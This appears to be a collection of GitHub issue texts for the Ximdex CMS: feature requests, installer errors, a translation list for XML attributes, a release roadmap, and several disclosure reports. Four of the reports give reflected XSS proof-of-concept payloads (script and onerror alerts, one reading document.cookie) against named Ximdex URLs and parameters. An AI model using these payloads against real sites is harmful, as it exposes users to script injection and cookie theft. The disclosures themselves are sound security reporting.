Simplification of names (for insntace, ptd for transformation templates should be xsl templates or directly Transformation Templates)

vulnerability url:
http://s03.damasco.ximdex.net/d3910b149e2ce84414e3ac292701ca52/edit
two parameters:
Ciudad
<img src=# onerror=alert(1)>
Nombre
<img src=# onerror=alert(1)>

result:

Author: [email protected]

It would be necessary to implement a way to concatenate some actions.

Vulnerability url :
http://demo.ximdex.com/xcms/index.php?action=createaccount
Vulnerability parameters:
sname,fname
payload:
fname=x"><script>alert(document.cookie)</script>//&sname=&email=&recaptcha_response_field=manual_challenge&newsletter=&enviar=Register&recaptcha_challenge_field=
fname=x&sname=x"><script>alert(document.cookie)</script>//&email=&recaptcha_response_field=manual_challenge&newsletter=&enviar=Register&recaptcha_challenge_field=
Vulnerability verification:
1, open the problematic page
2, use hackbar to simulate post submission, submit payload
3, the response page will pop up a cookie based on the inserted js code
4, using another question parameter fname, found to produce the same effect.

Repair proposal:
1, limit the input data, does not allow special characters;
2, Do not trust interaction data, filter all tags

( ! ) Fatal error: Call to undefined function posix_getgroups() in C:\wamp\www\xi\inc\install\managers\InstallManager.class.php on line 383
Call Stack

Time Memory Function Location

1 0.0029 163680 {main}( ) ..\index.php:0
2 2.0865 9045600 InstallController->dispatch( ) ..\index.php:126
3 2.0866 9045728 InstallController->compose( ) ..\InstallController.class.php:72
4 2.0866 9045776 InstallStepFactory::getStep( ) ..\InstallController.class.php:99
5 2.0901 9059536 Ximdex\Utils\Factory->instantiate( ) ..\InstallStepFactory.class.php:74
6 2.1591 9207856 GenericInstallStep->__construct( ) ..\Factory.php:85
7 2.1688 9210992 GenericInstallStep->checkPermissions( ) ..\GenericInstallStep.class.php:44
8 2.1688 9211040 InstallManager->checkFilePermissions( ) ..\GenericInstallStep.class.php:117
9 2.1722 9212104 InstallManager->checkGroup( ) ..\InstallManager.class.php:339

When the PHP disable_functions directive contains these functions:

• pcntl_fork
• pcntl_waitpid

the publication daemon doesn't work properly.

Nowadays, modules are installed automatically during the Ximdex installation if they are deployed with the core. The installer should download a module and install it.

Vulnerability url :
http://demo.ximdex.com/xfind/search
Vulnerability parameters:
filter[0][value]；filter[1][value]；filter[2][value]；filter[3][value]；filter[4][value]；filter[5][value]；filter[6][value]；filter[7][value]；filter[8][value]；filter[9][value]；filter[10][value]；filter[11][value]；filter[12][value]；
payload:
javascript:alert(3294)
Vulnerability verification:
1, open the problematic page

2, use hackbar to simulate post submission, submit payload
3, the response page will pop up the set contents according to the inserted js code
4, using another question parameters found to produce the same effect.

hey there,
wanted to try this on a virtualbox with port forwarding.
So, the url for accessing ximdex on my host system is:
http://localhost:8080/ximdex

But i can't give the port to the install script. if i type it at the appropriate place, i get an error saying the url is incorrect.
But if i specify it without url, it breaks completely

Any ideas?

Regards

Ximdex CMS uses an own root XML element to surround every XML file that it handles. This special XML element is called docxap.

For a full translation of the code, it's necessary that the docxap attributes would be translated into english. Here are the list of them and their translation candidates:

• tipo_documento -> schema
• idioma -> language
• idiomas -> languages
• canal -> channel
• canales -> channels
• canales_desc -> channels_desc (used?)
• nombre_tiponodo -> nodetype-name
• id_tiponodo -> nodetype-id
• documento -> document-name
• nombre_documento -> document-alias
• proyecto -> project
• servidor -> server

There are some visual issues on grid view and table view.

• The TH elements of the header are in a separate table containing the TR. This makes the width of the columns do not match.
• This is inherited from the table that could reorder columns in the search engine.
• You have to put everything in one table or control rather than the width of the columns match in the TH and TR.

Maybe the list view could be removed.

vulnerability url:
http://demo.ximdex.com/xowl/request.php
parameter content
payload:
<script>alert(document.domain)</script>

Author: [email protected]

Give the user a starting RNG schema and a XSL base template (called docxap) when a new project is created in Ximdex CMS.

In these new files will be shown some use examples and other technics to start developing our own RNG schemes and XSL templates.

Enable markdown support on text edition on common files. It would be necessary to add the proper mimetype to the table RelNodeTypeMimetype: text/x-markdown.

To avoid Xedit to load all the XSL templates when is opening a XML document, we propose to create a compiled file with all the XSL templates used in it.

Just a very schematic brief of the product releases as they are currently planed; i.e.:

v3.4, 2nd Quarter 2013 (published May 16th, https://github.com/XIMDEX/ximdex/wiki/ximdex-3.4-released)

• Refactoring of code to remove deprecated components
• Update to new versions of jquery, query UD and smarty.
• Update to PHP 5.4
• Cache for action selector (by user, role, section, nodetype)
• Usability: new gallery viewer for nodetype image, new contextual menu system, breadcrumbs on XML editor, ...
• Apache Stanbol for Xowl module

v3.5, 3rd quarter 2013

• Usability: icons as fonts, new folder creation selector to be ever less intrusive, new folder name convention, ...
• API REST with Linked Data support (possible Hydra)
• JS cache
• Installer with direct download of modules

v4.0, 1st semester 2014

• wysiwyg for XML for tablets
• Intelligent folders (sets)
• Themes (xlyre)
• Decoupled repositories
• Portal Configuration Manager
• ...

A REST API for selected actions (CRUD of some node types) and publish of contents. After it, could be of interest to provide a semantic description of the API.

Allow the navigation of documents in different portal versions.

Today, URLs in ximdex are including the language and channel for deployment directly after the name of the document (node) generating something as index-iden-idweb.html

This URLs are automatically generated by pathto() and should be modified to conform different url types as:

• no channel there, because it is the extension of the file (option during channel creation to tick if the extension has the identifier, guaranteeing there is only one extension for that type in a server path... channel for printing the document are not relevant anymore due to css, channels in ximdex are more related to technology frameworks -java, php- and usually are deployed in different sites)
• language appears as a folder after the project name (root of the web as www/en/index.html and www/es/index.html)
• language appears in the filename but could be removed for the main language (so index.html for english and index-ides.html for spanish)
• support to cue files to allow the web server to select languages

To improve performance, it's needed to perform a single request when editing a XML file with Xedit.

It would be a JSON object that contains the XML file, its XSL templates and its RNG schema.

During the installation process, the installer script doesn't set the permits correctly if apache tomcat is running on the same server.

This causes that Ximdex CMS can't write on the logs directory and other critical warning.

Workaround: execute the perms.sh script like this:
$> (located on the Ximdex root path): ./install/scripts/perm.sh -a

The -a stands for automatic mode.

Relax the number of nodes that are automatically created (table defaultcontents) when a new node for a nodetype is created, providing a visual selector of optional nodetypes to make them selectables.

Now, this error is strict. The installation process stops. The solution would be to give three options y for preceed,r for rename the host url and n for aborting the installation.

Hello:
I have find a Reflected XSS vulnerability.

The vulnerability exists due to insufficient filtration of user-supplied data in "url" HTTP parameter that will be passed to "ximdex-develop/extensions/csstidy/css_optimiser.php". The infected source code is line 139 there is no protection on $_REQUEST['url'], if it contains evil js code, line 139 will trigger untrusted code to be executed on the browser side.

So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil.
http://your-web-root/ximdex-develop/extensions/csstidy/css_optimiser.php?url="><script>alert(1);</script><"

The follow scrrenshot is the result to click the upper url ( win7 sp1 x64 + firefox 51.0.1 32bit ):

Discoverer: ADLab of Venustech

The idea is to find a tool able to manage external dependencies/bundles/extensions for explicit set them in a config file and remove that files from the codebase.

Maybe bundler, maven, graddle or whatever similar able to do the job.

Add a new toolbox on Xedit to paste text from different sources (PDFs, ODT docs, websites, etc) and clean the implicit format elements.

Maybe a textarea would be enough for the first approach.

INSTALLATION.md:

apache-mpm-worker => apache2-mpm-worker

due to the big percentage of javascript code in Ximdex a system for compacting or caching it could be of interest.